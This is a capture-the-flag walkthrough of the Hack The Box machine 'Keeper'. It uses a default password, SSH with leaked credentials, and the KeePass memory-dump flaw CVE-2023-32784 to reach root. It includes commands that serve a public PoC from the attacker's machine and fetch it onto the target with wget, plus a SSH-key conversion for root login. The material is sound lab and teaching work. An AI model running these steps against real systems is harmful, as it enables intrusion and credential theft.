This walkthrough is about the "hacking" of the HTB box "Keeper".
sudo nmap -sV {IP}
What interests us here is open TCP port 80, which hosts a running Nginx server, so we'll go ahead and check out the website. The page contains text pointing us to 'tickets.keeper.htb/rt/', which is where we'll head next.
When we go to 'tickets.keeper.htb/rt/', this error message greets us. To get past it, we add the domain to our hosts file.
sudo nano /etc/hosts
After reloading the page, the website becomes visible!
Initially, my approach involved searching for potential CVEs. While I did come across a few, unfortunately, none of them proved to be useful for this particular box.
As a next step, I decided to give the default password a shot:
After conducting some tests within the ticket system, I managed to uncover this user:
I stumbled upon an interesting comment related to the user!
Thus, I decided to attempt an SSH connection using the following command:
ssh lnorgaard@10.10.11.227
That approach worked like a charm! Fantastic!
I also came across the user flag ('user flag.txt') there.
Within lnorgaard's ticket, I stumbled upon this intriguing message:
With the recent KeePass bug fresh in my mind, I searched for potential avenues. After a brief investigation, I came across CVE-2023-32784 and a working exploit for it at https://github.com/CMEPW/keepass-dump-masterkey.
To get the PoC onto the target box, follow these steps:
- Download the script to your attacking machine:
  wget https://raw.githubusercontent.com/CMEPW/keepass-dump-masterkey/main/poc.py
- Start an HTTP server on your attacking machine (by default it serves plain HTTP on port 8000):
  python3 -m http.server
- From the SSH session on the target, fetch the script over plain HTTP (http://, not https://, since http.server has no TLS):
  wget http://{YOUR VPNIP}:8000/poc.py
- Finally, run the script against the memory dump:
  python3 poc.py KeePassDumpFull.dmp
Running the script should produce the following output:
Since the recovered string isn't the complete password, we need to dig deeper to uncover the real one. Noticing that certain letters stay consistent across the candidates, I'll focus on those.
To deduce the password, I tried a different approach: replacing the special (unrecovered) characters with '*' and using the resulting pattern to search for clues online.
The first search result is 'Rødgrød med fløde'. I'll test this phrase on the downloaded KeePass file.
Unfortunately, 'Rødgrød med fløde' didn't work. I'll now attempt the same phrase in full lowercase.
Once again, success! Great job!
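To make the "consistent letters" reasoning concrete, here is an added Python example of my own; it is not part of the write-up or of the PoC repository. It merges several partial recoveries, of the kind the PoC prints with '●' for positions it could not recover, into one mask, turns the mask into a regex, and checks candidate phrases against it both as-is and ignoring letter case (which is why the lowercase retry above still had to be tried: the first character is never recovered). The fragments and candidate phrases are constructed for illustration, not output from the box. The defender's takeaway is that even a few leaked characters shrink the search to a handful of guesses, which is why this process-memory leak (fixed in KeePass 2.54) mattered.

```python
import re
from typing import Iterable, List, Tuple

# The PoC marks a position it could not recover with this character.
UNKNOWN = "●"
# The write-up replaces unrecovered positions with '*' before searching.
WILDCARD = "*"

# Constructed sample fragments (not real output from the box): each one
# is a partial recovery in which some positions are unknown.
SAMPLE_FRAGMENTS = [
    "●ødgrød med fløde",
    "●●dgrød med fløde",
    "●ødgrød med fl●de",
]

# Constructed candidate phrases an online search for the mask might return.
CANDIDATES = [
    "Rødgrød med fløde",
    "rødgrød med fløde",
    "RØDGRØD MED FLØDE",
    "Rødgrød med fløde.",
]


def consensus_mask(fragments: Iterable[str]) -> str:
    """Merge partial recoveries into one search mask.

    A position keeps a concrete character only when every fragment that
    knows that position agrees on it; if fragments disagree, or none of
    them knows it, the position becomes WILDCARD. Shorter fragments are
    treated as unknown beyond their end.
    """
    fragments = list(fragments)
    if not fragments:
        return ""
    width = max(len(f) for f in fragments)
    mask = []
    for i in range(width):
        known = {f[i] for f in fragments if i < len(f) and f[i] != UNKNOWN}
        mask.append(known.pop() if len(known) == 1 else WILDCARD)
    return "".join(mask)


def mask_to_regex(mask: str, ignore_case: bool = False) -> "re.Pattern[str]":
    """Turn a mask into an anchored regex: '*' matches any single character."""
    body = "".join("." if c == WILDCARD else re.escape(c) for c in mask)
    return re.compile(f"^{body}$", re.IGNORECASE if ignore_case else 0)


def match_candidates(mask: str, candidates: Iterable[str]) -> Tuple[List[str], List[str]]:
    """Split candidates into those matching the mask exactly and those that
    match only when letter case is ignored. Both groups are still guesses:
    the mask cannot tell 'R' from 'r' at an unrecovered position."""
    exact_re = mask_to_regex(mask)
    loose_re = mask_to_regex(mask, ignore_case=True)
    exact, case_only = [], []
    for cand in candidates:
        if exact_re.match(cand):
            exact.append(cand)
        elif loose_re.match(cand):
            case_only.append(cand)
    return exact, case_only


if __name__ == "__main__":
    mask = consensus_mask(SAMPLE_FRAGMENTS)
    print("search mask:", mask)            # *ødgrød med fløde
    exact, case_only = match_candidates(mask, CANDIDATES)
    print("match as-is:", exact)           # both capitalised and lowercase
    print("match ignoring case:", case_only)
```

The mask is a filter, not an answer: anything it lets through still has to be tried against the database, which is exactly what the capitalised-then-lowercase attempts above did.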
In the Network category, a PuTTY SSH key for the root user is discovered. To use a PuTTY key on Linux, it has to be converted from PuTTY's '.ppk' format to the OpenSSH format (saved here with a '.pem' extension); the conversion is done with the 'puttygen' tool. Save each KeePass note to its own file, copying the note's entire content into the new file.
If the key file is named 'keeper.ppk', here's the command to perform the conversion:
puttygen keeper.ppk -O private-openssh -o htb.pem
After the conversion, you can SSH to the server with the converted key (make sure the key file is readable only by you, e.g. mode 0600, or ssh will refuse to use it):
ssh root@10.10.11.227 -i htb.pem
With this setup, you'll have access to retrieve the root flag!